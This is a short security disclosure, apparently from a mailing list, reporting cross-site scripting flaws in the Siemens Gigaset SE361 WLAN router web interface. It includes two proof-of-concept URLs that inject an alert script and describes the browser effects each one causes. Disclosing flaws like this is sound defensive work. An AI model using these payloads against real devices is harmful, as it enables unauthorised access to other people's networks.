<<< Date Index >>>     <<< Thread Index >>>

SIEMENS Gigaset SE361 router XSS



Vendor: SIEMENS 
Model: Gigaset SE361 WLAN
Firmware version: v1.00.0

Details:

http://routeraddr/prodhousing.gif";><script>alert('xss')</script>

Changes page and inputs the fallowing chars GIF89a,@? which appears to be a 
crash with GIF image decoding. 

http://routeraddr/login.tri";><script>alert('xss')</script>

Causes continues loop of trying to access the login page until you close 
browser.Works under IE7 and Firefox.